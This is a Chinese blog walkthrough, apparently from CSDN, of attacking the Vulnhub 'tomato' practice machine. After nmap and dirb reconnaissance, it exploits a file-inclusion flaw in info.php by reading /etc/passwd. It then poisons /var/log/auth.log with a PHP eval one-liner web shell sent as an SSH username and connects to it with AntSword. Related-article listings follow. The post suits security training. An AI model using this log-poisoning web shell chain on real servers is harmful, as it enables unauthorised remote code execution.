Vulnhub靶机tomato渗透(详细教程)

最新推荐文章于 2024-08-02 21:31:05 发布
最新推荐文章于 2024-08-02 21:31:05 发布
阅读量458 收藏 6
点赞数 10
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_76631050/article/details/140782337
版权

一、信息收集

1.主机发现

我们把虚拟机改为NAT模式,利用真实机的VMnet8 IP,将虚拟机的IP扫出来。

访问页面

2.主机扫描

这里使用的工具是Nmap来进行的主机扫描,使用命令如下:

nmap -A 192.168.222.133 -p-

如下图扫描结果,发现开放了21,80,2211,8888端口

3.目录扫描

既然开放了80端口,那么肯定要进行一次目录扫描,使用命令如下

dirb http://192.168.222.133

扫描结果如下,发现并没有多少东西,但是感觉第一个有东西

如下图访问目录antibot_image目录,如下图,发现了一堆东西

4.网页收集

其实经过搜索,看源代码,看网络,在

http://192.168.222.133/antibot_image/antibots/info.php

这个地址下面查看源代码发现了东西,如下图。

二、漏洞利用

1.文件包含漏洞

经过上面信息收集,我们发现antibot_image在这个目录下面有一堆东西,然后看代码include是包含,如下图经过测试发现拥有文件包含漏洞,这里的测试是读取/etc/passwd

在思考如何利用的时候,想到,可以尝试读取/var/log/auth.log这个文件,这个文件用处如下:

/var/ log / auth.log 这是一个文本文件,记录了所有和用户认证相关的 日志 。 无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

接下来就可以在日志里面写入一句话木马了,如下图,使用ssh连接失败日志写入一句木马。

ssh ' <?php @eval($_POST[cmd]);?> '@192.168.222.133 -p 2211

然后我们使用蚁剑验证一下是否有数据连接,是否成功,如下图,发现是成功的,url地址是

http://192.168.94.30/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log

连接成功

                                                                                                                                          Meet.meet

Meet.meet
关注
tomato靶机渗透测试
weixin_49340699的博客
07-28 1526
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
Vulnhub靶机tomato渗透
xingjinhao123的博客
02-26 1457
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/tomato-1,557/ 该靶机目标是获取root目录下的flag,难度是中等到困难 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.86 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取IP地址 扫描端口及其服务 扫描目录 开始访问 80端口首页是一张图片,源代码也没有获取有用的信息 server-status是一个目录 antibo
tomato-靶机渗透测试
m0_54323635的博客
10-09 248
tomato-靶机渗透测试
VulnHub渗透测试实战靶场 - Tomato1
LYJ20010728的博客
08-19 2472
VulnHub渗透测试实战靶场 - Tomato1环境下载Tomato1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.137 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-100
tomato-靶机渗透
weixin_53736204的博客
07-29 957
下载双击.ova文件,写文件名路径导入打开虚拟机用NAT模式编辑–>虚拟网络编辑器查看IP段。
【打靶记录】VulnHub-Tomato靶机渗透wp
qq_39972370的博客
11-17 2323
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。
vulnhub靶机渗透 Tomato
RestoreJustice的博客
03-19 572
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.137。需要url编码后才能执行,且蚁剑上不能执行,以前类似的环境试过,就python可以。靶机开启了21端口FTP服务、80端口Apache服务、2211端口ssh服务和8888端口nginx服务。尝试登录,被记入日志。使用了第一个,失败了。
vulnhub靶机Tomato
weixin_68416970的博客
08-02 1322
vulnhub靶机TomatoTomato 靶机是一个用于渗透测试和漏洞研究的虚拟机,它基于 Debian 操作系统。
Vulnhub靶机tomato渗透
weixin_57240513的博客
07-29 663
这是一个日志文件,记录了所有和用户认证相关的 日志。思路是往日志文件写入一句话木马,然后连接,写入方法就是使用一句话木马来作为用户进行SSH连接,这样。接下来就可以在日志里面写入一句话木马了,如下图,使用ssh连接失败日志写入一句木马。就会记录我们的登录,一句话木马也就被写入进去了,先查看是否能读取这个文件。是一个常见的系统日志文件,通常用于记录与系统认证和授权相关的信息。是包含,如下图经过测试发现拥有文件包含漏洞,这里的测试是读取。认证失败的尝试,例如错误的密码、无效的用户账号等。
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3243
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub靶机系列实战教程:涵盖Web漏洞利用与Linux提权技术
05-11
内容概要:本文详细介绍了多个VulnHub靶机系列的实战教程,由作者ins1ght撰写并分享在其个人博客上。这些靶机涵盖了从初级到中高级的不同难度级别,旨在帮助网络安全爱好者和初学者掌握渗透测试技能。每个靶机的攻略...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8697
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【CTF-Misc领域】文件隐写、内存取证与数据修复技术应用:安全竞赛核心技能解析
最新发布
05-17
内容概要:本文详细介绍了CTF-Misc题型的应用指南,涵盖文件隐写、内存取证、数据修复等方面的核心技术。文件操作与隐写部分,讲述了文件类型识别方法(如使用file命令、010 Editor等工具查看文件特征),以及文件分离与合并的方法(如Binwalk自动化工具、dd命令手动操作)。图片隐写技术方面,包括颜色通道分析(如使用Stegsolve)、帧差异对比、Exif信息读取等。内存取证则主要围绕Volatility框架展开,介绍其基础命令(如imageinfo、pslist)和特殊场景处理(如加密文档爆破)。此外,还提供了若干工具推荐,如十六进制编辑器、自动化分离工具、OCR识别库等,并分享了实战技巧,如逆向思维应用和隐蔽信息挖掘。 适合人群:对CTF比赛感兴趣的安全研究人员、网络安全爱好者及有一定计算机基础知识的学习者。 使用场景及目标:①掌握文件隐写与修复技术,能够识别和处理各种文件类型的隐写和损坏问题;②学会使用Volatility进行内存取证,提取关键信息;③提高对隐蔽信息的敏感度,培养解决复杂问题的能力。 阅读建议:本文内容丰富,涉及多个技术领域,建议读者先熟悉基本概念和常用工具的使用,再逐步深入理解各个技术细节,在实践中不断积累经验。
CSAPP程序人生大作业
05-17
CSAPP程序人生大作业
基于python+树莓派图像识别的智能循迹避障小车+源码+项目文档(毕业设计&课程设计&项目开发)
05-17
基于python+树莓派图像识别的智能循迹避障小车+源码+项目文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档 具体原理 道路检测 本程序所使用的道路检测算法为最基础的检测算法,可升级至深度学习算法,但是没时间搞主要是不会 对于道路检测而言,最基本的就是在图像上随机抽取图像上下部等宽区域,将图像的灰度中心计算出来,由此可以看出,当上半部图像的灰度中心与下半部图像中心的位置差超出阈值时,判定道路出现了转弯,以图像中心为坐标原点,当插值大于0时说明要右转,反之左转。可自由设置。 标识牌检测 使用opencv自带的训练网络,虽然实际训练了,但是结果较差,采用了国外训练好的图像模型,在代码中提供了。 障碍物检测 超声波检测,虽然没啥用,毕竟我们的障碍物是停止标志,图像的精度目前看来比超声波准,不过本着买了就要用的原则,用了 距离测算 采用单目视觉,首先对相机进行标定,然后利用角度计算得出前方的实际距离。但是相机在运动过程晃动较大,最后还是热熔胶枪粘的,这个功能的演示就弃了。
深度学习中基于层结构添加自注意力机制的技术研究及其应用 特征融合
05-17
内容概要:本文探讨了在深度学习框架下,通过在神经网络的层结构中引入自注意力机制来提升模型性能的方法。首先介绍了自注意力机制的基本概念及其在序列数据处理中的优势,然后详细阐述了如何在每一层中添加自注意力层以及如何融合不同层次的自注意力输出。最后,通过一系列实验验证了这种方法在自然语言处理和计算机视觉任务中的有效性,证明了其能够显著提高模型的表现。 适合人群:从事深度学习研究和技术开发的专业人士,尤其是对自注意力机制感兴趣的科研人员和工程师。 使用场景及目标:适用于需要改进现有神经网络模型性能的项目,特别是在处理复杂序列数据的任务中,如文本分类、图像识别等。目标是通过引入自注意力机制优化模型架构,增强模型对不同层次特征的理解能力。 阅读建议:对于希望深入了解自注意力机制并将其应用于实际项目的读者来说,本文提供了详细的理论背景和实现步骤。建议读者结合自己的应用场景,尝试复现文中提到的实验,以便更好地掌握这一技术。
SYN.SHX
05-17
拷贝到Auto CAD的Fonts下
单级蜗轮蜗杆减速器的设计.rar
05-17
单级蜗轮蜗杆减速器的设计.rar
vulnhub靶机渗透测试教学
01-11
### VulnHub靶机渗透测试教程 #### 了解目标环境 对于VulnHub上的DC-1靶机,攻击者通常会设置在一个特定的网络环境中。例如,在此案例中,攻击者的Kali Linux机器位于`192.168.189.148`而Ubuntu靶机则处于同一子网...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值